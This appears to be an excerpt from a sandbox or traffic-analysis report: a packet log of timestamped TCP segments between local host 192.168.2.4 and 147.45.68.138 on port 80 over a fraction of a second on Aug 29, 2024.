                                                      Aug 29, 2024 22:52:27.269146919 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269344091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269361019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269383907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269395113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269407034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269409895 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269417048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269428968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269433022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269447088 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269459009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269469976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269475937 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269490957 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269498110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269510031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269510984 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269521952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269532919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269534111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269542933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269546032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269565105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269587994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270337105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270347118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270356894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270385981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270404100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270418882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270431042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270442963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270458937 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270468950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270472050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270486116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270490885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270498037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270509958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270524979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270541906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270545006 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270555019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270565987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270576954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270591021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270613909 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270721912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270733118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270742893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270764112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270790100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270828962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270857096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270868063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270870924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270893097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270896912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270905972 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270906925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270924091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270926952 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270936012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270946980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270947933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270957947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.270967007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.270981073 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.271003008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.271270990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.271298885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.271308899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.271316051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.271332026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.271336079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.271344900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.271354914 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.271368027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.271375895 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.271378994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.271404028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.271415949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.271419048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.271425962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.271440983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.271446943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.271467924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272073030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272109985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272166014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272177935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272186995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272206068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272219896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272223949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272234917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272245884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272262096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272269011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272286892 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272291899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272303104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272309065 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272315025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272329092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272341013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272345066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272353888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272361994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272366047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272368908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272387981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272403002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272403955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272418022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272438049 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272443056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272454977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272455931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272491932 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272491932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272506952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272517920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272528887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272532940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272550106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.272555113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272578955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.272603989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273336887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273361921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273374081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273382902 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273386002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273396969 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273400068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273410082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273413897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273426056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273435116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273444891 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273458958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273459911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273475885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273477077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273488045 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273494005 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273514032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273526907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273535013 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273545980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273556948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273562908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273570061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273581982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273581982 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.273590088 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273607969 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.273626089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355053902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355108023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355300903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355313063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355318069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355324030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355338097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355354071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355366945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355382919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355405092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355411053 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355416059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355427980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355439901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355451107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355451107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355460882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355469942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355473042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355483055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355490923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355494976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355499983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355509996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355525970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355526924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355551004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355570078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355644941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355655909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355667114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355685949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355701923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355712891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355724096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355734110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355746984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355751038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355772972 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355796099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355822086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355834007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355844021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355861902 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355865955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355878115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355886936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355887890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355901003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355901003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355912924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355920076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355923891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.355943918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355957031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.355983019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356024981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.356065035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356076002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356086016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356106043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.356128931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.356148005 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356158972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356168985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356187105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.356213093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356213093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.356252909 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.356302977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356312990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356323004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356332064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356340885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.356343985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356355906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356368065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356370926 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.356378078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.356385946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.356409073 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357347965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357358932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357372046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357398987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357428074 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357429028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357439995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357451916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357467890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357470989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357479095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357497931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357507944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357527018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357537985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357547998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357566118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357588053 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357618093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357634068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357645035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357651949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357656002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357667923 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357673883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357680082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357687950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357717037 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357721090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357741117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357752085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357764006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357765913 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357777119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.357789040 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.357815981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358128071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358139038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358150959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358170986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358174086 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358182907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358191967 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358217955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358217955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358234882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358246088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358254910 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358277082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358279943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358293056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358304977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358316898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358320951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358331919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358341932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358345032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358352900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358352900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358366966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358366966 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358388901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358416080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.358973980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358984947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.358994961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359018087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.359039068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.359101057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359112024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359122992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359134912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359148026 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.359154940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359173059 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.359179974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359181881 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.359194040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359204054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359215021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359221935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.359225988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359232903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.359237909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359249115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.359262943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.359281063 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.360146999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.360172033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.360182047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.360189915 CEST4973980192.168.2.4147.45.68.138
